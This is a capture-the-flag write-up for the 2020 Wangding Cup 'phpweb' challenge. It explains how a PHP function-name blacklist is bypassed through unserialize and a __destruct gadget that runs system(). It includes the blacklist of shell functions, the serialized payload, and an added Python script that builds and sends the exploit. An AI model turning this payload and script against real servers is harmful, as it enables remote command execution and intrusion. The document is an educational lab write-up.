網鼎盃 2020 朱雀組 phpweb

2022-05-21 12:27:11 · 2051 characters · 4361 reads

Deserialization

Looking at the page source, I found something nice: a hidden button. At first I wanted to just edit the HTML, but the page kept refreshing itself, so I captured the request instead. On a whim I changed whatever followed `func`, and the error revealed call_user_func().

That is great news: it means the value that normally carries `date` has to be a function name, and `p` is that function's argument. Overjoyed, I tried `cat /flag` and got slapped down; the challenge is not that simple. So first `func=highlight_file&p=index.php` to get the source.

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
// Note the typo "registregister_shutdown_function": register_shutdown_function itself is not in the list.
// The function and class bodies below were lost when the page was extracted; they are
// reconstructed from the behaviour described in this writeup (call_user_func on $func
// with $p, result echoed only when it is a string, __destruct calling gettime).
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    if (gettype($result) == "string") {
        return $result;
    } else {
        return "";
    }
}
class test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    if (!in_array(strtolower($func), $disable_fun)) {
        echo gettime($func, $p);
    } else {
        echo "Hacker...";
    }
}
?>

Seeing that long filter list, I knew a direct getshell was out. But we can get around the filter with deserialization: `unserialize` is not in the blacklist, and once the object is unserialized its `__destruct` calls `gettime`, which does the `call_user_func` with the object's own `func` and `p`. The blacklist is only checked against the `func` parameter we send directly, so the function name stored inside the serialized object is never checked.

<?php
// Payload generator. serialize() only records property names and values, so the
// class here carries no __destruct: nothing runs locally while we build the string.
class test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
}
$a = new test();
$a->p = 'ls /';
$a->func = 'system';
echo serialize($a);
?>

Then send it through Burp as `func=unserialize` with `p` set to the serialized string, `O:4:"test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}`; the object is destroyed at the end of the request and the command output lands in the response.

After that it is just a matter of changing the command and looking around until you find the flag.
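As an added example (not part of the original writeup and not the challenge's own code): a small Python helper that builds the PHP-serialized `test` object with correct byte lengths and assembles the two POST parameters, checking on the way that the outer function passes the blacklist and the inner one would not. The blacklist is copied from `index.php` above; the target URL passed to `send()` is an assumption.

```python
import urllib.parse
import urllib.request

# Blacklist copied from the challenge's index.php (it contains the typo
# "registregister_shutdown_function", so register_shutdown_function itself is unlisted).
DISABLE_FUN = {
    "exec", "shell_exec", "system", "passthru", "proc_open", "show_source",
    "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch",
    "escapeshellcmd", "escapeshellarg", "assert", "substr_replace",
    "call_user_func_array", "call_user_func", "array_filter", "array_walk",
    "array_map", "registregister_shutdown_function", "register_tick_function",
    "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce",
    "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents",
}


def php_serialize_string(s: str) -> str:
    """PHP's s:<len>:"<raw>"; form. <len> is the UTF-8 byte length, not the
    character count, which matters as soon as the command contains non-ASCII."""
    return f's:{len(s.encode("utf-8"))}:"{s}";'


def php_serialize_object(classname: str, props: dict) -> str:
    """O:<len>:"<class>":<n>:{<name><value>...} for string-valued properties,
    emitted in the order the class declares them (p, then func, for test)."""
    body = "".join(php_serialize_string(k) + php_serialize_string(v)
                   for k, v in props.items())
    return f'O:{len(classname.encode("utf-8"))}:"{classname}":{len(props)}:{{{body}}}'


def build_request(cmd: str, inner_func: str = "system") -> dict:
    """Return the func/p POST parameters for the bypass.

    The direct func ("unserialize") must pass the blacklist; the function that
    actually runs the command sits inside the object and is only reached via
    __destruct -> gettime, which never consults the blacklist."""
    outer = "unserialize"
    if outer in DISABLE_FUN:
        raise ValueError("unserialize is filtered; this bypass would not work")
    if inner_func not in DISABLE_FUN:
        raise ValueError(f"{inner_func} is not filtered; call it directly instead")
    payload = php_serialize_object("test", {"p": cmd, "func": inner_func})
    return {"func": outer, "p": payload}


def send(url: str, cmd: str, timeout: float = 10.0) -> str:
    """POST the payload to index.php (the URL is an assumption) and return the
    response body; the command output is appended when the object is destroyed."""
    data = urllib.parse.urlencode(build_request(cmd)).encode()
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Hypothetical usage: print the encoded body, or send("http://target/index.php", "ls /")
    print(urllib.parse.urlencode(build_request("ls /")))
```

`urlencode` escapes the semicolons, braces and quotes in `p`, so the string survives the POST body intact; when sending by hand in Burp, paste the raw serialized string and let the Repeater tab encode it.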
